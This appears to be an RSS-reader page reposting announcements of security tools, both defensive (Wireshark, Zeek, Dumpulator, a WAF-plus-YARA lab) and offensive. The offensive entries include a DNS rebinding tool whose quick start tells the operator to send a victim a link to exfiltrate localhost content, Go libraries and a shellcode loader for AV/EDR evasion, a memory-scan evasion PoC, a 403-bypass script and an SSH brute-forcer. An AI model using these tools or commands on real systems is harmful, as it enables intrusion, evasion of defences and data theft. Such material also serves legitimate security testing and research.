FreshRSS

๐Ÿ”’
โŒ Secure Planet Training Courses Updated For 2019 - Click Here
There are new available articles, click to refresh the page.
Before yesterdayTools

Wireshark Analyzer 4.0.6

Wireshark is a GTK+-based network protocol analyzer that lets you capture and interactively browse the contents of network frames. The goal of the project is to create a commercial-quality analyzer for Unix and Win32 and to give Wireshark features that are missing from closed-source sniffers. This is the source code release.

tc Tor Chat Client

tc is a low-tech free software to chat anonymously and ciphered over Tor circuits in PGP. Use it to protected your communication end-to-end with RSA/DSA encryption and keep yourself anonymously reachable by anyone who only knows your .onion address and your public key. All this and more in 2400 lines of C code that compile and run on BSD and Linux systems with an IRC like GUI.

rebindMultiA - Tool To Perform a Multiple A Record Rebind Attack

By: Zion3R


rebindMultiA is a tool to perform a Multiple A Record rebind attack.

rebindmultia.com is a domain that I've set up to assist with these attacks. It makes every IP its own authoritative nameserver for the domain [IP].ns.rebindmultia.com. For example, 13.33.33.37.ns.rebindmultia.com's authoritative nameserver is 13.33.33.37.ip.rebindmultia.com which resolves (as you might have guessed) to 13.33.33.37.


Multiple A Record Rebind Attack

The MultiA Record Rebind attack is a variant of DNS Rebinding that weaponizes an attacker's ability to respond with two IP address in response to a DNS request and the browser's tendency to fallback to the second IP in the DNS response when the first one doesn't respond. In this attack, the attacker will configure a malicious DNS server and two malicious HTTP servers. The DNS server will respond with two A records:

127.0.0.1.target.13.33.33.37.ns.rebindmultia.com. 0 IN A 13.33.33.37
127.0.0.1.target.13.33.33.37.ns.rebindmultia.com. 0 IN A 127.0.0.1

The victim browser will then connect to the first IP and begin interacting with the attacker's first malicious HTTP server. This server will respond with a page that contains two iframes, one to /steal and one to /rebind. The /steal iframe will load up a malicious page to reach into the second iframe and grab the content. The /rebind endpoint, when hit, will issue a 302 redirect to / and kill the first malicious HTTP server. As a result, when the browser reaches back out to the attacker's HTTP server, it will be met with a closed port. As such, it will fallback to the second IP. Once the target content has been loaded in the second iframe, the first iframe can reach into it, steal the data, and exfiltrate it to the attacker's second malicious HTTP server - the callback server.

This attack only works in a Windows environment. Linux and Mac will default to the private IP first and the attacker's server will never be queried.

Graphic + Explaination

  1. The browser resolves the host 127.0.0.1.target.13.33.33.37.ns.rebindmultia.com.
  2. The DNS server (included in server.py) parses the requested dns name and returns two A records: 13.33.33.37 and 127.0.0.1.
  3. The victim's browser reaches out the attacker's malicious HTTP server (included in server.py) and loads the /parent page which has two iframes.
  4. The victim's browser loads /steal from the attacker's malicious HTTP server.
  5. The victim's browser loads /rebind which results in a 302 redirect to / (the HTTP server will exit after this request).
  6. The victim's browser redirect's to / per the 302 from the attacker's server.
  7. The victim's browser attempts to load / from the attacker's (now dead) HTTP server, but fails to do so.
  8. The browser then shifts to the second IP in the DNS cache and resolves the hostname to 127.0.0.1. It then reaches out to that server and loads up the page in the iframe.
  9. The attacker's steal iframe reaches into the newly loaded second iframe and grabs the content.
  10. The attacker's steal iframe then sends the results back to the attacker's callback server.

Usage

pip3 install -r requirements.txt
python3 server.py --help
usage: server.py [-h] [-p PORT] [-c CALLBACK_PORT] [-d DNS_PORT] [-f FILE] [-l LOCATION]

optional arguments:
-h, --help show this help message and exit
-p PORT, --port PORT Specify port to attack on targetIp. Default: 80
-c CALLBACK_PORT, --callback-port CALLBACK_PORT
Specify the callback HTTP server port. Default: 31337
-d DNS_PORT, --dns-port DNS_PORT
Specify the DNS server port. Default: 53
-f FILE, --file FILE Specify the HTML file to display in the first iframe.(The "steal" iframe). Default: steal.html
-l LOCATION, --location LOCATION
Specify the location of the data you'd like to steal on the target. Default: /

If you get this error:

โ”ฌโ”€[justin@RhynoDroplet:~/p/rebindMultiA]โ”€[14:26:24]โ”€[G:master=]
โ•ฐโ”€>$ python3 server.py

Traceback (most recent call last):
File "server.py", line 2, in <module>
from http.server import HTTPServer, BaseHTTPRequestHandler, ThreadingHTTPServer
ImportError: cannot import name 'ThreadingHTTPServer'

Then you need to use a more up-to-date version of Python. Python 3.7+.

Quick Start

This must be executed from publically accessible IP.

git clone https://github.com/Rhynorater/rebindMultiA
cd rebindMutliA
pip3 install -r requirements.txt
echo "Send your victim to http://127.0.0.1.target.`curl -s http://ipinfo.io/ip`.ns.rebindmultia.com/parent to exfil 127.0.0.1"
sudo python3 server.py


Jsfinder - Fetches JavaScript Files Quickly And Comprehensively

By: Zion3R


jsFinder is a command-line tool written in Go that scans web pages to find JavaScript files linked in the HTML source code. It searches for any attribute that can contain a JavaScript file (e.g., src, href, data-main, etc.) and extracts the URLs of the files to a text file. The tool is designed to be simple to use, and it supports reading URLs from a file or from standard input.

jsFinder is useful for web developers and security professionals who want to find and analyze the JavaScript files used by a web application. By analyzing the JavaScript files, it's possible to understand the functionality of the application and detect any security vulnerabilities or sensitive information leakage.


Features

  • Reading URLs from a file or from stdin using command line arguments.
  • Running multiple HTTP GET requests concurrently to each URL.
  • Limiting the concurrency of HTTP GET requests using a flag.
  • Using a regular expression to search for JavaScript files in the response body of the HTTP GET requests.
  • Writing the found JavaScript files to a file specified in the command line arguments or to a default file named "output.txt".
  • Printing informative messages to the console indicating the status of the program's execution and the output file's location.
  • Allowing the program to run in verbose or silent mode using a flag.

Installation

jsfinder requires Go 1.20 to install successfully.Run the following command to get the repo :

go install -v github.com/kacakb/jsfinder@latest

Usage

To see which flags you can use with the tool, use the -h flag.

jsfinder -h 
Flag Description
-l Specifies the filename to read URLs from.
-c Specifies the maximum number of concurrent requests to be made. The default value is 20.
-s Runs the program in silent mode. If this flag is not set, the program runs in verbose mode.
-o Specifies the filename to write found URLs to. The default filename is output.txt.
-read Reads URLs from stdin instead of a file specified by the -l flag.

Demo

I

Fetches JavaScript files quickly and comprehensively. (6)

If you want to read from stdin and run the program in silent mode, use this command:

cat list.txt| jsfinder -read -s -o js.txt

ย 

II

Fetches JavaScript files quickly and comprehensively. (7)

If you want to read from a file, you should specify it with the -l flag and use this command:

jsfinder -l list.txt -s -o js.txt

You can also specify the concurrency with the -c flag.The default value is 20. If you want to read from a file, you should specify it with the -l flag and use this command:

jsfinder -l list.txt -c 50 -s -o js.txt

TODOs

  • Adding new features
  • Improving performance
  • Adding a cookie flag
  • Reading regex from a file
  • Integrating the kacak tool (coming soon)

Screenshot

Contact

If you have any questions, feedback or collaboration suggestions related to this project, please feel free to contact me via:

e-mail

Stegano 0.11.2

Stegano is a basic Python Steganography module. Stegano implements two methods of hiding: using the red portion of a pixel to hide ASCII messages, and using the Least Significant Bit (LSB) technique. It is possible to use a more advanced LSB method based on integers sets. The sets (Sieve of Eratosthenes, Fermat, Carmichael numbers, etc.) are used to select the pixels used to hide the information.

Acheron - Indirect Syscalls For AV/EDR Evasion In Go Assembly

By: Zion3R


Acheron is a library inspired by SysWhisper3/FreshyCalls/RecycledGate, with most of the functionality implemented in Go assembly.

acheron package can be used to add indirect syscall capabilities to your Golang tradecraft, to bypass AV/EDRs that makes use of usermode hooks and instrumentation callbacks to detect anomalous syscalls that don't return to ntdll.dll, when the call transition back from kernel->userland.


Main Features

  • No dependencies
  • Pure Go and Go assembly implementation
  • Custom string encryption/hashing function support to counter static analysis

How it works

The following steps are performed when creating a new syscall proxy instance:

  1. Walk the PEB to retrieve the base address of in-memory ntdll.dll
  2. Parse the exports directory to retrieve the address of each exported function
  3. Calculate the system service number for each Zw* function
  4. Enumerate unhooked/clean syscall;ret gadgets in ntdll.dll, to be used as trampolines
  5. Creates the proxy instance, which can be used to make indirect (or direct) syscalls

Quickstart

Integrating acheron into your offsec tools is pretty easy. You can install the package with:

go get -u github.com/f1zm0/acheron

Then just need to call acheron.New() to create a syscall proxy instance and use acheron.Syscall() to make an indirect syscall for Nt* APIs.

Minimal example:

package main

import (
"fmt"
"unsafe"

"github.com/f1zm0/acheron"
)

func main() {
var (
baseAddr uintptr
hSelf = uintptr(0xffffffffffffffff)
)

// creates Acheron instance, resolves SSNs, collects clean trampolines in ntdll.dlll, etc.
ach, err := acheron.New()
if err != nil {
panic(err)
}

// indirect syscall for NtAllocateVirtualMemory
s1 := ach.HashString("NtAllocateVirtualMemory")
if retcode, err := ach.Syscall(
s1, // function name hash
hSelf, // arg1: _In_ HANDLE ProcessHandle,
uintptr(unsafe.Pointer(&baseAddr)), // arg2: _Inout_ PVOID *BaseAddress,
uintptr(unsafe.Pointer(nil)), // arg3: _In_ ULONG_PTR ZeroBits,
0x1000, // arg4: _Inout_ PSIZE_T RegionSize,
windows.MEM_COMMIT|windows.MEM_RESERVE, // arg5: _In_ ULONG AllocationType,
windows.PAGE_EXECUTE_READWRITE, // arg6: _In_ ULONG Protect
); err != nil {
panic(err)
}
fmt.Printf(
"allocated memory with NtAllocateVirtualMemory (status: 0x%x)\n",
retcode,
)

// ...
}

Examples

The following examples are included in the repository:

Example Description
sc_inject Extremely simple process injection PoC, with support for both direct and indirect syscalls
process_snapshot Using indirect syscalls to take process snapshots with syscalls
custom_hashfunc Example of custom encoding/hashing function that can be used with acheron

Other projects that use acheron:

Contributing

Contributions are welcome! Below are some of the things that it would be nice to have in the future:

  • 32-bit support
  • Other resolver types (e.g. HalosGate/TartarusGate)
  • More examples

If you have any suggestions or ideas, feel free to open an issue or a PR.

References

Additional Notes

The name is a reference to the Acheron river in Greek mythology, which is the river where souls of the dead are carried to the underworld.

Note
This project uses semantic versioning. Minor and patch releases should not break compatibility with previous versions. Major releases will only be used for major changes that break compatibility with previous versions.

Warning
This project has been created for educational purposes only. Don't use it to on systems you don't own. The developer of this project is not responsible for any damage caused by the improper usage of the library.

License

This project is licensed under the MIT License - see the LICENSE file for details



Zeek 5.0.9

Zeek is a powerful network analysis framework that is much different from the typical IDS you may know. While focusing on network security monitoring, Zeek provides a comprehensive platform for more general network traffic analysis as well. Well grounded in more than 15 years of research, Zeek has successfully bridged the traditional gap between academia and operations since its inception. Today, it is relied upon operationally in particular by many scientific environments for securing their cyber-infrastructure. Zeek's user community includes major universities, research labs, supercomputing centers, and open-science communities. This is the source code release.

Nmap Port Scanner 7.94

Nmap is a utility for port scanning large networks, although it works fine for single hosts. Sometimes you need speed, other times you may need stealth. In some cases, bypassing firewalls may be required. Not to mention the fact that you may want to scan different protocols (UDP, TCP, ICMP, etc.). Nmap supports Vanilla TCP connect() scanning, TCP SYN (half open) scanning, TCP FIN, Xmas, or NULL (stealth) scanning, TCP ftp proxy (bounce attack) scanning, SYN/FIN scanning using IP fragments (bypasses some packet filters), TCP ACK and Window scanning, UDP raw ICMP port unreachable scanning, ICMP scanning (ping-sweep), TCP Ping scanning, Direct (non portmapper) RPC scanning, Remote OS Identification by TCP/IP Fingerprinting, and Reverse-ident scanning. Nmap also supports a number of performance and reliability features such as dynamic delay time calculations, packet timeout and retransmission, parallel port scanning, detection of down hosts via parallel pings.

Hades - Go Shellcode Loader That Combines Multiple Evasion Techniques

By: Zion3R


Hades is a proof of concept loader that combines several evasion technques with the aim of bypassing the defensive mechanisms commonly used by modern AV/EDRs.


Usage

The easiest way, is probably building the project on Linux using make.

git clone https://github.com/f1zm0/hades && cd hades
make

Then you can bring the executable to a x64 Windows host and run it with .\hades.exe [options].

PS > .\hades.exe -h

'||' '||' | '||''|. '||''''| .|'''.|
|| || ||| || || || . ||.. '
||''''|| | || || || ||''| ''|||.
|| || .''''|. || || || . '||
.||. .||. .|. .||. .||...|' .||.....| |'....|'

version: dev [11/01/23] :: @f1zm0

Usage:
hades -f <filepath> [-t selfthread|remotethread|queueuserapc]

Options:
-f, --file <str> shellcode file path (.bin)
-t, --technique <str> injection technique [selfthread, remotethread, queueuserapc]

Example:

Inject shellcode that spawms calc.exe with queueuserapc technique:

.\hades.exe -f calc.bin -t queueuserapc

Showcase

User-mode hooking bypass with syscall RVA sorting (NtQueueApcThread hooked with frida-trace and custom handler)

Instrumentation callback bypass with indirect syscalls (injected DLL is from syscall-detect by jackullrich)

Additional Notes

Direct syscall version

In the latest release, direct syscall capabilities have been replaced by indirect syscalls provided by acheron. If for some reason you want to use the previous version of the loader that used direct syscalls, you need to explicitly pass the direct_syscalls tag to the compiler, which will figure out what files needs to be included and excluded from the build.

GOOS=windows GOARCH=amd64 go build -ldflags "-s -w" -tags='direct_syscalls' -o dist/hades_directsys.exe cmd/hades/main.go

Disclaimers

Warning
This project has been created for educational purposes only, to experiment with malware dev in Go, and learn more about the unsafe package and the weird Go Assembly syntax. Don't use it to on systems you don't own. The developer of this project is not responsible for any damage caused by the improper use of this tool.

Credits

Shoutout to the following people that shared their knowledge and code that inspired this tool:

License

This project is licensed under the GPLv3 License - see the LICENSE file for details



Bypass-403 - A Simple Script Just Made For Self Use For Bypassing 403

By: Zion3R


  • A simple script just made for self use for bypassing 403
  • It can also be used to compare responses on verious conditions as shown in the below snapย 

Usage

./bypass-403.sh https://example.com admin

./bypass-403.sh website-here path-here

Features

  • Use 24 known Bypasses for 403 with the help of curl

Installation

  • git clone https://github.com/iamj0ker/bypass-403
  • cd bypass-403
  • chmod +x bypass-403.sh
  • sudo apt install figlet - If you are unable to see the logo as in the screenshot
  • sudo apt install jq - If you don't have jq installed on your machine

Contributers

remonsec, manpreet MayankPandey01 saadibabar



Dumpulator - An Easy-To-Use Library For Emulating Memory Dumps. Useful For Malware Analysis (Config Extraction, Unpacking) And Dynamic Analysis In General (Sandboxing)

By: Zion3R


Note: This is a work-in-progress prototype, please treat it as such. Pull requests are welcome! You can get your feet wet with good first issues

An easy-to-use library for emulating code in minidump files. Here are some links to posts/videos using dumpulator:


Examples

Calling a function

The example below opens StringEncryptionFun_x64.dmp (download a copy here), allocates some memory and calls the decryption function at 0x140001000 to decrypt the string at 0x140017000:

from dumpulator import Dumpulator

dp = Dumpulator("StringEncryptionFun_x64.dmp")
temp_addr = dp.allocate(256)
dp.call(0x140001000, [temp_addr, 0x140017000])
decrypted = dp.read_str(temp_addr)
print(f"decrypted: '{decrypted}'")

The StringEncryptionFun_x64.dmp is collected at the entry point of the tests/StringEncryptionFun example. You can get the compiled binaries for StringEncryptionFun here

Tracing execution

from dumpulator import Dumpulator

dp = Dumpulator("StringEncryptionFun_x64.dmp", trace=True)
dp.start(dp.regs.rip)

This will create StringEncryptionFun_x64.dmp.trace with a list of instructions executed and some helpful indications when switching modules etc. Note that tracing significantly slows down emulation and it's mostly meant for debugging.

Reading utf-16 strings

from dumpulator import Dumpulator

dp = Dumpulator("my.dmp")
buf = dp.call(0x140001000)
dp.read_str(buf, encoding='utf-16')

Running a snippet of code

Say you have the following function:

00007FFFC81C06C0 | mov qword ptr [rsp+0x10],rbx       ; prolog_start
00007FFFC81C06C5 | mov qword ptr [rsp+0x18],rsi
00007FFFC81C06CA | push rbp
00007FFFC81C06CB | push rdi
00007FFFC81C06CC | push r14
00007FFFC81C06CE | lea rbp,qword ptr [rsp-0x100]
00007FFFC81C06D6 | sub rsp,0x200 ; prolog_end
00007FFFC81C06DD | mov rax,qword ptr [0x7FFFC8272510]

You only want to execute the prolog and set up some registers:

from dumpulator import Dumpulator

prolog_start = 0x00007FFFC81C06C0
# we want to stop the instruction after the prolog
prolog_end = 0x00007FFFC81C06D6 + 7

dp = Dumpulator("my.dmp", quiet=True)
dp.regs.rcx = 0x1337
dp.start(start=prolog_start, end=prolog_end)
print(f"rsp: {hex(dp.regs.rsp)}")

The quiet flag suppresses the logs about DLLs loaded and memory regions set up (for use in scripts where you want to reduce log spam).

Custom syscall implementation

You can (re)implement syscalls by using the @syscall decorator:

from dumpulator import *
from dumpulator.native import *
from dumpulator.handles import *
from dumpulator.memory import *

@syscall
def ZwQueryVolumeInformationFile(dp: Dumpulator,
FileHandle: HANDLE,
IoStatusBlock: P[IO_STATUS_BLOCK],
FsInformation: PVOID,
Length: ULONG,
FsInformationClass: FSINFOCLASS
):
return STATUS_NOT_IMPLEMENTED

All the syscall function prototypes can be found in ntsyscalls.py. There are also a lot of examples there on how to use the API.

To hook an existing syscall implementation you can do the following:

import dumpulator.ntsyscalls as ntsyscalls

@syscall
def ZwOpenProcess(dp: Dumpulator,
ProcessHandle: Annotated[P[HANDLE], SAL("_Out_")],
DesiredAccess: Annotated[ACCESS_MASK, SAL("_In_")],
ObjectAttributes: Annotated[P[OBJECT_ATTRIBUTES], SAL("_In_")],
ClientId: Annotated[P[CLIENT_ID], SAL("_In_opt_")]
):
process_id = ClientId.read_ptr()
assert process_id == dp.parent_process_id
ProcessHandle.write_ptr(0x1337)
return STATUS_SUCCESS

@syscall
def ZwQueryInformationProcess(dp: Dumpulator,
ProcessHandle: Annotated[HANDLE, SAL("_In_")],
ProcessInformationClass: Annotated[PROCESSINFOCLASS, SAL("_In_")],
ProcessInformation: Annotated[PVOID, SAL("_Out_wri tes_bytes_(ProcessInformationLength)")],
ProcessInformationLength: Annotated[ULONG, SAL("_In_")],
ReturnLength: Annotated[P[ULONG], SAL("_Out_opt_")]
):
if ProcessInformationClass == PROCESSINFOCLASS.ProcessImageFileNameWin32:
if ProcessHandle == dp.NtCurrentProcess():
main_module = dp.modules[dp.modules.main]
image_path = main_module.path
elif ProcessHandle == 0x1337:
image_path = R"C:\Windows\explorer.exe"
else:
raise NotImplementedError()
buffer = UNICODE_STRING.create_buffer(image_path, ProcessInformation)
assert ProcessInformationLength >= len(buffer)
if ReturnLength.ptr:
dp.write_ulong(ReturnLength.ptr, len(buffer))
ProcessInformation.write(buffer)
return STATUS_SUCCESS
return ntsyscal ls.ZwQueryInformationProcess(dp,
ProcessHandle,
ProcessInformationClass,
ProcessInformation,
ProcessInformationLength,
ReturnLength
)

Custom structures

Since v0.2.0 there is support for easily declaring your own structures:

from dumpulator.native import *

class PROCESS_BASIC_INFORMATION(Struct):
ExitStatus: ULONG
PebBaseAddress: PVOID
AffinityMask: KAFFINITY
BasePriority: KPRIORITY
UniqueProcessId: ULONG_PTR
InheritedFromUniqueProcessId: ULONG_PTR

To instantiate these structures you have to use a Dumpulator instance:

pbi = PROCESS_BASIC_INFORMATION(dp)
assert ProcessInformationLength == Struct.sizeof(pbi)
pbi.ExitStatus = 259 # STILL_ACTIVE
pbi.PebBaseAddress = dp.peb
pbi.AffinityMask = 0xFFFF
pbi.BasePriority = 8
pbi.UniqueProcessId = dp.process_id
pbi.InheritedFromUniqueProcessId = dp.parent_process_id
ProcessInformation.write(bytes(pbi))
if ReturnLength.ptr:
dp.write_ulong(ReturnLength.ptr, Struct.sizeof(pbi))
return STATUS_SUCCESS

If you pass a pointer value as a second argument the structure will be read from memory. You can declare pointers with myptr: P[MY_STRUCT] and dereferences them with myptr[0].

Collecting the dump

There is a simple x64dbg plugin available called MiniDumpPlugin The minidump command has been integrated into x64dbg since 2022-10-10. To create a dump, pause execution and execute the command MiniDump my.dmp.

Installation

From PyPI (latest release):

python -m pip install dumpulator

To install from source:

python setup.py install

Install for a development environment:

python setup.py develop

Related work

  • Dumpulator-IDA: This project is a small POC plugin for launching dumpulator emulation within IDA, passing it addresses from your IDA view using the context menu.
  • wtf: Distributed, code-coverage guided, customizable, cross-platform snapshot-based fuzzer designed for attacking user and / or kernel-mode targets running on Microsoft Windows
  • speakeasy: Windows sandbox on top of unicorn.
  • qiling: Binary emulation framework on top of unicorn.
  • Simpleator: User-mode application emulator based on the Hyper-V Platform API.

What sets dumpulator apart from sandboxes like speakeasy and qiling is that the full process memory is available. This improves performance because you can emulate large parts of malware without ever leaving unicorn. Additionally only syscalls have to be emulated to provide a realistic Windows environment (since everything actually is a legitimate process environment).

Credits



KoodousFinder - A Simple Tool To Allows Users To Search For And Analyze Android Apps For Potential Security Threats And Vulnerabilities

By: Zion3R


A simple tool to allows users to search for and analyze android apps for potential security threats and vulnerabilities


Account and API Key

Create a Koodous account and get your api key https://koodous.com/settings/developers

Install

$ pip install koodousfinder

Arguments

Param description
-h, --help 'Show this help message and exit'
--package-name "General search for APKs"`
--app-name Name of the app to search for

Examples

koodous.py --package-name "app: Brata AND package: com.brata"
koodous.py --package-name "package: com.google.android.videos AND trusted: true"
koodous.py --package-name "com.metasploit"
python3 koodous.py --app-name "WhatsApp MOD"



Modifiers for advanced search

Attribute Modifier Description
Hash hash: Performs the search depending on the automatically inserted hash. The admitted hashes are sha1, sha256 and md5.
App name app: Searches for the specified app name. If it is a compound name, it can be searched enclosed in quotes, for example: app: "Whatsapp premium".
Package name. package: Searches the package name to see if it contains the indicated string, for example: package: com.whatsapp.
Name of the developer or company. developer: Searches whether the company or developer field includes the indicated string, for example: developer: "WhatsApp Inc.".
Certificate certificate: Searches the apps by their certificate. For example: cert: 60BBF1896747E313B240EE2A54679BB0CE4A5023 or certificate: 38A0F7D505FE18FEC64FBF343ECAAAF310DBD799.

More information: https://docs.koodous.com/apks.html.
#TODO

  • Discord Integration
  • Rulesets view


Wafaray - Enhance Your Malware Detection With WAF + YARA (WAFARAY)

By: Zion3R

WAFARAY is a LAB deployment based on Debian 11.3.0 (stable) x64 made and cooked between two main ingredients WAF + YARA to detect malicious files (e.g. webshells, virus, malware, binaries) typically through web functions (upload files).


Purpose

In essence, the main idea came to use WAF + YARA (YARA right-to-left = ARAY) to detect malicious files at the WAF level before WAF can forward them to the backend e.g. files uploaded through web functions see: https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload

When a web page allows uploading files, most of the WAFs are not inspecting files before sending them to the backend. Implementing WAF + YARA could provide malware detection before WAF forwards the files to the backend.

Do malware detection through WAF?

Yes, one solution is to use ModSecurity + Clamav, most of the pages call ClamAV as a process and not as a daemon, in this case, analysing a file could take more than 50 seconds per file. See this resource: https://kifarunix.com/intercept-malicious-file-upload-with-modsecurity-and-clamav/

Do malware detection through WAF + YARA?

:-( A few clues here Black Hat Asia 2019 please continue reading and see below our quick LAB deployment.

WAFARAY: how does it work ?

Basically, It is a quick deployment (1) with pre-compiled and ready-to-use YARA rules via ModSecurity (WAF) using a custom rule; (2) this custom rule will perform an inspection and detection of the files that might contain malicious code, (3) typically web functions (upload files) if the file is suspicious will reject them receiving a 403 code Forbidden by ModSecurity.

โœ”๏ธThe YaraCompile.py compiles all the yara rules. (Python3 code)
โœ”๏ธThe test.conf is a virtual host that contains the mod security rules. (ModSecurity Code)
โœ”๏ธModSecurity rules calls the modsec_yara.py in order to inspect the file that is trying to upload. (Python3 code)
โœ”๏ธYara returns two options 1 (200 OK) or 0 (403 Forbidden)

Main Paths:

  • Yara Compiled rules: /YaraRules/Compiled
  • Yara Default rules: /YaraRules/rules
  • Yara Scripts: /YaraRules/YaraScripts
  • Apache vhosts: /etc/apache2/sites-enabled
  • Temporal Files: /temporal

Approach

  • Blueteamers: Rule enforcement, best alerting, malware detection on files uploaded through web functions.
  • Redteamers/pentesters: GreyBox scope , upload and bypass with a malicious file, rule enforcement.
  • Security Officers: Keep alerting, threat hunting.
  • SOC: Best monitoring about malicious files.
  • CERT: Malware Analysis, Determine new IOC.

Building Detection Lab

The Proof of Concept is based on Debian 11.3.0 (stable) x64 OS system, OWASP CRC v3.3.2 and Yara 4.0.5, you will find the automatic installation script here wafaray_install.sh and an optional manual installation guide can be found here: manual_instructions.txt also a PHP page has been created as a "mock" to observe the interaction and detection of malicious files using WAF + YARA.

Installation (recommended) with shell scripts

โœ”๏ธStep 2: Deploy using VMware or VirtualBox
โœ”๏ธStep 3: Once installed, please follow the instructions below:
alex@waf-labs:~$ su root 
root@waf-labs:/home/alex#

# Remember to change YOUR_USER by your username (e.g waf)
root@waf-labs:/home/alex# sed -i 's/^\(# User privi.*\)/\1\nalex ALL=(ALL) NOPASSWD:ALL/g' /etc/sudoers
root@waf-labs:/home/alex# exit
alex@waf-labs:~$ sudo sed -i 's/^\(deb cdrom.*\)/#\1/g' /etc/apt/sources.list
alex@waf-labs:~$ sudo sed -i 's/^# \(deb\-src http.*\)/ \1/g' /etc/apt/sources.list
alex@waf-labs:~$ sudo sed -i 's/^# \(deb http.*\)/ \1/g' /etc/apt/sources.list
alex@waf-labs:~$ echo -ne "\n\ndeb http://deb.debian.org/debian/ bullseye main\ndeb-src http://deb.debian.org/debian/ bullseye main\n" | sudo tee -a /etc/apt/sources.list
alex@waf-labs:~$ sudo apt-get update
alex@waf-labs:~$ sudo apt-get install sudo -y
alex@waf-labs:~$ sudo apt-get install git vim dos2unix net-tools -y
alex@waf-labs:~$ git clone https://github.com/alt3kx/wafarayalex@waf-labs:~$ cd wafaray
alex@waf-labs:~$ dos2unix wafaray_install.sh
alex@waf-labs:~$ chmod +x wafaray_install.sh
alex@waf-labs:~$ sudo ./wafaray_install.sh >> log_install.log

# Test your LAB environment
alex@waf-labs:~$ firefox localhost:8080/upload.php

Yara Rules

Once the Yara Rules were downloaded and compiled.

It is similar to when you deploy ModSecurity, you need to customize what kind of rule you need to apply. The following log is an example of when the Web Application Firewall + Yara detected a malicious file, in this case, eicar was detected.

Message: Access denied with code 403 (phase 2). File "/temporal/20220812-184146-YvbXKilOKdNkDfySME10ywAAAAA-file-Wx1hQA" rejected by 
the approver script "/YaraRules/YaraScripts/modsec_yara.py": 0 SUSPECTED [YaraSignature: eicar]
[file "/etc/apache2/sites-enabled/test.conf"] [line "56"] [id "500002"]
[msg "Suspected File Upload:eicar.com.txt -> /temporal/20220812-184146-YvbXKilOKdNkDfySME10ywAAAAA-file-Wx1hQA - URI: /upload.php"]

Testing WAFARAY... voilร ...

Stop / Start ModSecurity

$ sudo service apache2 stop
$ sudo service apache2 start

Apache Logs

$ cd /var/log
$ sudo tail -f apache2/test_access.log apache2/test_audit.log apache2/test_error.log

Demos

Be careful about your test. The following demos were tested on isolated virtual machines.

Demo 1 - EICAR

A malicious file is uploaded, and the ModSecurity rules plus Yara denied uploading file to the backend if the file matched with at least one Yara Rule. (Example of Malware: https://secure.eicar.org/eicar.com.txt) NOT EXECUTE THE FILE.

Demo 2 - WebShell.php

For this demo, we disable the rule 933110 - PHP Inject Attack to validate Yara Rules. A malicious file is uploaded, and the ModSecurity rules plus Yara denied uploading file to the backend if the file matched with at least one Yara Rule. (Example of WebShell PHP: https://github.com/drag0s/php-webshell) NOT EXECUTE THE FILE.

Demo 3 - Malware Bazaar (RecordBreaker) Published: 2022-08-13

A malicious file is uploaded, and the ModSecurity rules plus Yara denied uploading file to the backend if the file matched with at least one Yara Rule. (Example of Malware Bazaar (RecordBreaker): https://bazaar.abuse.ch/sample/94ffc1624939c5eaa4ed32d19f82c369333b45afbbd9d053fa82fe8f05d91ac2/) NOT EXECUTE THE FILE.

YARA Rules sources

In case that you want to download more yara rules, you can see the following repositories:

References

Roadmap until next release

  • Malware Hash Database (MLDBM). The Database stores the MD5 or SHA1 that files were detected as suspicious.
  • To be tested CRS Modsecurity v.3.3.3 new rules
  • ModSecurity rules improvement to malware detection with Database.
  • To be created blacklist and whitelist related to MD5 or SHA1.
  • To be tested, run in background if the Yara analysis takes more than 3 seconds.
  • To be tested, new payloads, example: Powershell Obfuscasted (WebShells)
  • Remarks for live enviroments. (WAF AWS, WAF GCP, ...)

Authors

Alex Hernandez aka (@_alt3kx_)
Jesus Huerta aka @mindhack03d

Contributors

Israel Zeron Medina aka @spk085



RustChain - Hide Memory Artifacts Using ROP And Hardware Breakpoints

By: Zion3R


This tool is a simple PoC of how to hide memory artifacts using a ROP chain in combination with hardware breakpoints. The ROP chain will change the main module memory page's protections to N/A while sleeping (i.e. when the function Sleep is called). For more detailed information about this memory scanning evasion technique check out the original project Gargoyle. x64 only.

The idea is to set up a hardware breakpoint in kernel32!Sleep and a new top-level filter to handle the exception. When Sleep is called, the exception filter function set before is triggered, allowing us to call the ROP chain without the need of using classic function hooks. This way, we avoid leaving weird and unusual private memory regions in the process related to well known dlls.

The ROP chain simply calls VirtualProtect() to set the current memory page to N/A, then calls SleepEx and finally restores the RX memory protection.


The overview of the process is as follows:

  • We use SetUnhandledExceptionFilter to set a new exception filter function.
  • SetThreadContext is used in order to set a hardware breakpoint on kernel32!Sleep.
  • We call Sleep, triggering the hardware breakpoint and driving the execution flow towards our exception filter function.
  • The ROP chain is called from the exception filter function, allowing to change the current memory page protection to N/A. Then SleepEx is called. Finally, the ROP chain restores the RX memory protection and the normal execution continues.

This process repeats indefinitely.

As it can be seen in the image, the main module's memory protection is changed to N/A while sleeping, which avoids memory scans looking for pages with execution permission.

Compilation

Since we are using LITCRYPT plugin to obfuscate string literals, it is required to set up the environment variable LITCRYPT_ENCRYPT_KEY before compiling the code:

C:\Users\User\Desktop\RustChain> set LITCRYPT_ENCRYPT_KEY="yoursupersecretkey"

After that, simply compile the code and run the tool:

C:\Users\User\Desktop\RustChain> cargo build
C:\Users\User\Desktop\RustChain\target\debug> rustchain.exe

Limitations

This tool is just a PoC and some extra features should be implemented in order to be fully functional. The main purpose of the project was to learn how to implement a ROP chain and integrate it within Rust. Because of that, this tool will only work if you use it as it is, and failures are expected if you try to use it in other ways (for example, compiling it to a dll and trying to reflectively load and execute it).

Credits



Cbrutekrag - Penetration Tests On SSH Servers Using Brute Force Or Dictionary Attacks. Written In C

By: Zion3R


Penetration tests on SSH servers using dictionary attacks. Written in C.

brute krag means "brute force" in afrikรกans

Disclaimer

This tool is for ethical testing purpose only.
cbrutekrag and its owners can't be held responsible for misuse by users.
Users have to act as permitted by local law rules.

ย 

Requirements

cbrutekrag uses libssh - The SSH Library (http://www.libssh.org/)

Build

Requirements:

  • make
  • gcc compiler
  • libssh-dev
git clone --depth=1 https://github.com/matricali/cbrutekrag.git
cd cbrutekrag
make
make install

Static build

Requirements:

  • cmake
  • gcc compiler
  • make
  • libssl-dev
  • libz-dev
git clone --depth=1 https://github.com/matricali/cbrutekrag.git
cd cbrutekrag
bash static-build.sh
make install

Run

